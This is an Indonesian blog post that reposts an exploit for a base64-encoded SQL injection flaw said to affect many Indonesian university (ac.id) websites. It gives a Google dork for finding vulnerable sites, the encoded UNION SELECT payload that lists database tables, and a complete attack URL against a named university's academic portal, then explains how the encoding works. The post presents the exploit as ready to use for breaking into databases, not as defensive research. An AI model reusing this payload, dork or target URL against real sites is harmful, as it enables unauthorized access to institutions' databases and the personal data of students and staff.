Bug Situs Akademik Indonesia (ac.id) Vuln Base64 SQL Injection

Author : UnknownTidak ada komentar

Tadi malam iseng jalan jalan di salahsatu grup underground terkenal di Indonesia, dan ada yang share 'bug' SQLi base64 pada banyak situs akademik (ac.id). Query nya pun hampir sama semua. Sehingga saat kalian menemukan situs yang memiliki celah ini, cukup memasukkan 'exploit' nya , dan isi database akan kelihatan.


See how its work :
# Exploit Title: Indonesian University Base64 SQL Injection
# Google Dork: news/berita-kampus-MQ== ( use your brain b!tch )
# Date: [04 - 05 - 2016 23:51]
# Exploit Author: Defacer Tersakiti
# Tested on: Ubuntu Linux, Windows

Exploit : 
LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Simple Exploit :
Kita ambil contoh situs Siakad Universitas Kanjuruhan Malang :
http://siakad.unikama.ac.id/index.php/news/berita-kampus-MQ==

Sekarang ganti MQ== dengan kode exploit diatas :

http://siakad.unikama.ac.id/index.php/news/berita-kampus-LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Boom... database kebuka.
Oke disini jaka akan menjelaskan bagaimana cara kerja nya :
diatas ada kode MQ== . MQ== adalah bentuk base64 dari '1' .
Silahkan didecode di situs online atau kalau kalian menggunakan linux bisa test via terminal.

:~$ base64 -d <<< MQ==

Maka outpunya adalah angka 1.
Nah, sekarang kita ganti MQ== dengan MSc=
Maka isi berita nya akan blank. Kenapa MSc= ? MSc= adalah bentuk encode base64 dari 1' .
akame@linuxsec:~$ echo -n "1'" | base64
MSc=
Yup, kita memberi string dibelakang angka untuk mengecek apakah error atau tidak.
Nah sekarang kalian tau kan kode exploit diatas berasal dari mana. Yup, dari hasil encode query berikut :
-1' UNION SELECT 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database()-- -

Oke mungkin sekian dulu penjelasan singkat dari saya.
Untuk dasar SQL Injection Base64 bisa dilihat disini :
SQL Injection Base64 Tutorial
Untuk Step by step basic manual injection bisa dilihat disini :
SQL Injection Manual With Hackbar

Kurang Jelas langsung komen aja.

Artikel Terkait

Posted On : Minggu, 26 Februari 2017Time : 04.58
SHARE TO :
| | Template Created By : Binkbenks | CopyRigt By : My Blog | |
close
Banner iklan disini
> [Tutup]